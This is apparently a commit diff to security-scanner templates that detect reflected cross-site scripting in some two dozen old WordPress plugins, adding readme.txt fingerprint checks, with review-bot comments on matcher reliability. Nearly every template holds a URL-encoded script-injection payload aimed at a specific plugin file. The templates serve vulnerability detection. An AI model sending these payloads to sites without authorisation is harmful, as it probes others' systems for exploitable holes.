Wordpress FP Fix

patch-1
Ritik Chaddha 2024-03-21 13:25:50 +05:30
parent 2ede6795a6
commit c68dd7249c
29 changed files with 389 additions and 3 deletions


@ -30,7 +30,20 @@ info:
product: sniplets_plugin product: sniplets_plugin
tags: cve2008,cve,xss,wp-plugin,wp,edb,wpscan,wordpress,sniplets tags: cve2008,cve,xss,wp-plugin,wp,edb,wpscan,wordpress,sniplets
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/sniplets/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Code Snippets'
- method: GET - method: GET
path: path:
- '{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - '{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
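Review bot: The new `http(1)` readme.txt gate under `flow: http(1) && http(2)` turns a missing readme into a silent skip, so a host that deletes or blocks `readme.txt` but still serves the plugin's PHP files is never probed and reads as clean in scan output. Nothing in the added lines documents that trade-off; a comment above the first request such as `# http(1): fingerprint the plugin via readme.txt; hosts that remove or block readme.txt are skipped, not confirmed safe` would make it visible to whoever triages results. The same applies to every other readme-gated template in this commit. The template body continues outside the hunk.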


@ -29,7 +29,20 @@ info:
google-query: inurl:"/wp-content/plugins/flash-album-gallery" google-query: inurl:"/wp-content/plugins/flash-album-gallery"
tags: cve,cve2011,wordpress,xss,wp-plugin,codeasily tags: cve,cve2011,wordpress,xss,wp-plugin,codeasily
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/flash-album-gallery/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Grand Flagallery'
- method: GET - method: GET
path: path:
- '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - '{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'


@ -30,7 +30,20 @@ info:
google-query: inurl:"/wp-content/plugins/adminimize/" google-query: inurl:"/wp-content/plugins/adminimize/"
tags: cve2011,cve,wordpress,xss,wp-plugin,bueltge tags: cve2011,cve,wordpress,xss,wp-plugin,bueltge
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/adminimize/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Adminimize ==='
- method: GET - method: GET
path: path:
- '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'


@ -28,7 +28,20 @@ info:
google-query: inurl:"/wp-content/plugins/skysa-official/" google-query: inurl:"/wp-content/plugins/skysa-official/"
tags: cve,cve2011,wordpress,xss,wp-plugin,skysa tags: cve,cve2011,wordpress,xss,wp-plugin,skysa
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/skysa-official/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Skysa App'
- method: GET - method: GET
path: path:
- '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - '{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'


@ -28,7 +28,20 @@ info:
google-query: inurl:"/wp-content/plugins/clickdesk-live-support-chat/" google-query: inurl:"/wp-content/plugins/clickdesk-live-support-chat/"
tags: cve2011,cve,wordpress,xss,wp-plugin,clickdesk tags: cve2011,cve,wordpress,xss,wp-plugin,clickdesk
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/clickdesk-live-support-chat/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'ClickDesk Live Support - Live Chat'
- method: GET - method: GET
path: path:
- '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'


@ -27,7 +27,20 @@ info:
google-query: inurl:"/wp-content/plugins/featurific-for-wordpress" google-query: inurl:"/wp-content/plugins/featurific-for-wordpress"
tags: cve2011,cve,wordpress,xss,wp-plugin,featurific_for_wordpress_project tags: cve2011,cve,wordpress,xss,wp-plugin,featurific_for_wordpress_project
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/featurific-for-wordpress/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Featurific For Wordpress'
- method: GET - method: GET
path: path:
- '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - '{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'


@ -28,7 +28,20 @@ info:
google-query: inurl:"/wp-content/plugins/all-in-one-event-calendar" google-query: inurl:"/wp-content/plugins/all-in-one-event-calendar"
tags: cve,cve2012,wordpress,xss,wp-plugin,timely tags: cve,cve2012,wordpress,xss,wp-plugin,timely
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/all-in-one-event-calendar/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'All-in-One Event Calendar'
- method: GET - method: GET
path: path:
- '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - '{{BaseURL}}/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php?title=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'


@ -29,7 +29,20 @@ info:
product: wp-facethumb product: wp-facethumb
tags: cve,cve2012,packetstorm,wordpress,xss,wp-plugin,mnt-tech tags: cve,cve2012,packetstorm,wordpress,xss,wp-plugin,mnt-tech
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/wp-facethumb/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'WP-FaceThumb ==='
- method: GET - method: GET
path: path:
- '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - '{{BaseURL}}/?page_id=1&pagination_wp_facethumb=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'


@ -26,7 +26,20 @@ info:
product: mf_gig_calendar product: mf_gig_calendar
tags: cve,cve2012,wordpress,xss,wp-plugin,mf_gig_calendar_project tags: cve,cve2012,wordpress,xss,wp-plugin,mf_gig_calendar_project
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/mf-gig-calendar/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'MF Gig Calendar ='
- method: GET - method: GET
path: path:
- '{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - '{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'


@ -30,7 +30,22 @@ info:
google-query: inurl:"/wp-content/plugins/2-click-socialmedia-buttons" google-query: inurl:"/wp-content/plugins/2-click-socialmedia-buttons"
tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,ppfeufer tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,ppfeufer
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/2-click-socialmedia-buttons/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- '2 Click Social Media Buttons'
- 'Tags:'
condition: and
- method: GET - method: GET
path: path:
- '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'


@ -29,7 +29,20 @@ info:
framework: wordpress framework: wordpress
tags: cve,cve2012,xss,wp-plugin,packetstorm,wordpress,mikejolley tags: cve,cve2012,xss,wp-plugin,packetstorm,wordpress,mikejolley
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/download-monitor/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Download Monitor ='
- method: GET - method: GET
path: path:
- '{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - '{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'


@ -29,7 +29,20 @@ info:
product: wordpress_integrator product: wordpress_integrator
tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,wordpress_integrator_project tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm,wordpress_integrator_project
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/wp-integrator/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Wordpress Integrator'
- method: GET - method: GET
path: path:
- '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E' - '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E'


@ -27,7 +27,22 @@ info:
google-query: inurl:"/wp-content/plugins/uploader" google-query: inurl:"/wp-content/plugins/uploader"
tags: cve,cve2013,wordpress,xss,wp-plugin,roberta_bramski tags: cve,cve2013,wordpress,xss,wp-plugin,roberta_bramski
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/uploader/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Uploader'
- "Tags:"
condition: and
- method: GET - method: GET
path: path:
- '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
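Review bot: The fingerprint words `'Uploader'` and `"Tags:"` in the added `http(1)` matcher are generic enough that a catch-all or soft-404 page served for `readme.txt` could contain both, which would let the probe through and undo the false-positive fix. The matcher does not check the response status, so consider pairing it with a `status` matcher for 200 under `matchers-condition: and`, or anchoring the word on the readme title line the way the adminimize template does with `'Adminimize ==='`. The same loose pairing appears with `'Navis'` and `'Infusionsoft'` in their templates. The two words here also mix quote styles; `- 'Tags:'` would match the rest of the commit.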


@ -29,17 +29,32 @@ info:
google-query: inurl:"/wp-content/plugins/trafficanalyzer" google-query: inurl:"/wp-content/plugins/trafficanalyzer"
tags: cve2013,cve,packetstorm,wordpress,xss,wp-plugin,wptrafficanalyzer tags: cve2013,cve,packetstorm,wordpress,xss,wp-plugin,wptrafficanalyzer
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/trafficanalyzer/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'traffic analy'
- 'Tags:'
condition: and
- method: GET - method: GET
path: path:
- '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E' - '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E'
matchers-condition: and matchers-condition: and
matchers: matchers:
- type: word - type: word
part: body part: body
words: words:
- "<script>alert(1)</script>" - "<script>alert(document.domain)</script>"
- type: word - type: word
part: header part: header
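Review bot: The readme word `'traffic analy'` is lowercase and its matcher has no `case-insensitive: true`, so if the plugin's readme capitalises its title the gate never matches and `http(2)` is never sent. The infusionsoft and sourceafrica templates in this commit set `case-insensitive: true` on the same kind of check; adding it here, and to `'anti plagiarism'` in the anti-plagiarism template, would keep the gate from producing false negatives. The readme content is not visible on this page, so this is worth confirming against a real install. The second request's matcher list continues past the end of the hunk.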


@ -30,7 +30,20 @@ info:
google-query: inurl:"/wp-content/plugins/category-grid-view-gallery" google-query: inurl:"/wp-content/plugins/category-grid-view-gallery"
tags: cve2013,cve,seclists,packetstorm,wordpress,xss,wp-plugin,anshul_sharma tags: cve2013,cve,seclists,packetstorm,wordpress,xss,wp-plugin,anshul_sharma
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/category-grid-view-gallery/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Category Grid View Gallery ='
- method: GET - method: GET
path: path:
- '{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - '{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'


@ -29,7 +29,20 @@ info:
google-query: inurl:"/wp-content/plugins/duplicator" google-query: inurl:"/wp-content/plugins/duplicator"
tags: cve2013,cve,seclists,wordpress,xss,wp-plugin,packetstorm,cory_lamle tags: cve2013,cve,seclists,wordpress,xss,wp-plugin,packetstorm,cory_lamle
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/duplicator/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Duplicator - WordPress Migration'
- method: GET - method: GET
path: path:
- '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' - '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'


@ -28,7 +28,20 @@ info:
google-query: inurl:"/wp-content/plugins/activehelper-livehelp" google-query: inurl:"/wp-content/plugins/activehelper-livehelp"
tags: cve2014,cve,wordpress,xss,wp-plugin,activehelper tags: cve2014,cve,wordpress,xss,wp-plugin,activehelper
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/activehelper-livehelp/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'ActiveHelper LiveHelp Live Chat'
- method: GET - method: GET
path: path:
- '{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&' - '{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&'


@ -30,7 +30,23 @@ info:
google-query: inurl:"/wp-content/plugins/infusionsoft/Infusionsoft/" google-query: inurl:"/wp-content/plugins/infusionsoft/Infusionsoft/"
tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,katz tags: cve2014,cve,wpscan,wordpress,wp-plugin,xss,unauth,katz
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/infusionsoft/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Infusionsoft'
- 'Tags:'
condition: and
case-insensitive: true
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&" - "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"


@ -28,7 +28,22 @@ info:
framework: wordpress framework: wordpress
tags: cve2014,cve,wordpress,wp-plugin,xss,wpscan,unauth,movies_project tags: cve2014,cve,wordpress,wp-plugin,xss,wpscan,unauth,movies_project
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/movies/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Movies ='
- 'Tags:'
condition: and
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&" - "{{BaseURL}}/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"


@ -29,7 +29,22 @@ info:
framework: wordpress framework: wordpress
tags: cve2014,cve,wordpress,wp-plugin,xss,weather,wpscan,unauth,ultimate-weather_project tags: cve2014,cve,wordpress,wp-plugin,xss,weather,wpscan,unauth,ultimate-weather_project
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/ultimate-weather-plugin/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Ultimate Weather'
- 'Tags:'
condition: and
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - "{{BaseURL}}/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"


@ -30,7 +30,20 @@ info:
google-query: inurl:"/wp-content/plugins/dzs-videogallery" google-query: inurl:"/wp-content/plugins/dzs-videogallery"
tags: cve2014,cve,wordpress,xss,wp-plugin,seclists,digitalzoomstudio tags: cve2014,cve,wordpress,xss,wp-plugin,seclists,digitalzoomstudio
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/dzs-videogallery/readme HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Video Gallery WordPress DZS'
- method: GET - method: GET
path: path:
- '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E' - '{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E'
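Review bot: The gate request fetches `/wp-content/plugins/dzs-videogallery/readme` with no `.txt` extension, unlike every other template in this commit, and if that is a typo the gate can never match and the template stops reporting altogether. If the plugin really ships an extensionless readme, a short comment saying so (`# this plugin ships "readme", not "readme.txt"`) would keep someone from "correcting" it later. The probe on the unchanged path line also still uses `alert(1)` while the trafficanalyzer template was moved to `alert(document.domain)` in this commit; the matchers are outside the hunk, so whether they would need the same change cannot be judged from here.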


@ -30,7 +30,7 @@ info:
vendor: ab_google_map_travel_project vendor: ab_google_map_travel_project
product: ab_google_map_travel product: ab_google_map_travel
framework: wordpress framework: wordpress
tags: cve,cve2015,xss,wordpress,wp-plugin,wp,ab-map,packetstorm,ab_google_map_travel_project tags: cve,cve2015,xss,wordpress,wp-plugin,wp,ab-map,authenticated,ab_google_map_travel_project
http: http:
- raw: - raw:


@ -31,7 +31,22 @@ info:
google-query: inurl:"/wp-content/plugins/navis-documentcloud" google-query: inurl:"/wp-content/plugins/navis-documentcloud"
tags: cve2015,cve,wordpress,wp-plugin,xss,documentcloud tags: cve2015,cve,wordpress,wp-plugin,xss,documentcloud
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/navis-documentcloud/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Navis'
- 'Tags:'
condition: and
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - "{{BaseURL}}/wp-content/plugins/navis-documentcloud/js/window.php?wpbase=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"


@ -30,7 +30,20 @@ info:
framework: wordpress framework: wordpress
tags: cve2015,cve,wp-plugin,wp,edb,wpscan,wordpress,xss,church_admin_project tags: cve2015,cve,wp-plugin,wp,edb,wpscan,wordpress,xss,church_admin_project
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/church-admin/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Church Admin ='
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - "{{BaseURL}}/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"


@ -27,7 +27,23 @@ info:
framework: wordpress framework: wordpress
tags: cve2015,cve,wp-plugin,xss,packetstorm,wordpress,sourceafrica_project tags: cve2015,cve,wp-plugin,xss,packetstorm,wordpress,sourceafrica_project
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/sourceafrica/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'SourceAfrica'
- 'Tags:'
condition: and
case-insensitive: true
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - "{{BaseURL}}/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"


@ -31,7 +31,22 @@ info:
google-query: inurl:"/wp-content/plugins/wp-symposium" google-query: inurl:"/wp-content/plugins/wp-symposium"
tags: cve2015,cve,xss,wpscan,wordpress,wp-plugin,wpsymposiumpro tags: cve2015,cve,xss,wpscan,wordpress,wp-plugin,wpsymposiumpro
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/wp-symposium/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'WP Symposium'
- 'Tags:'
condition: and
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - "{{BaseURL}}/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"


@ -31,7 +31,20 @@ info:
google-query: inurl:"/wp-content/plugins/admin-font-editor" google-query: inurl:"/wp-content/plugins/admin-font-editor"
tags: cve2016,cve,wordpress,xss,wp-plugin,admin-font-editor_project tags: cve2016,cve,wordpress,xss,wp-plugin,admin-font-editor_project
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/admin-font-editor/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Admin Font Editor'
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - "{{BaseURL}}/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"


@ -29,7 +29,20 @@ info:
framework: wordpress framework: wordpress
tags: cve2016,cve,wordpress,xss,wp-plugin,ajax-random-post_project tags: cve2016,cve,wordpress,xss,wp-plugin,ajax-random-post_project
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/ajax-random-post/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'Ajax Random Post'
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - "{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"


@ -27,7 +27,22 @@ info:
google-query: inurl:"/wp-content/plugins/anti-plagiarism" google-query: inurl:"/wp-content/plugins/anti-plagiarism"
tags: cve2016,cve,wordpress,xss,wp-plugin,anti-plagiarism_project tags: cve2016,cve,wordpress,xss,wp-plugin,anti-plagiarism_project
flow: http(1) && http(2)
http: http:
- raw:
- |
GET /wp-content/plugins/anti-plagiarism/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
internal: true
words:
- 'anti plagiarism'
- 'Tags:'
condition: and
- method: GET - method: GET
path: path:
- "{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" - "{{BaseURL}}/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"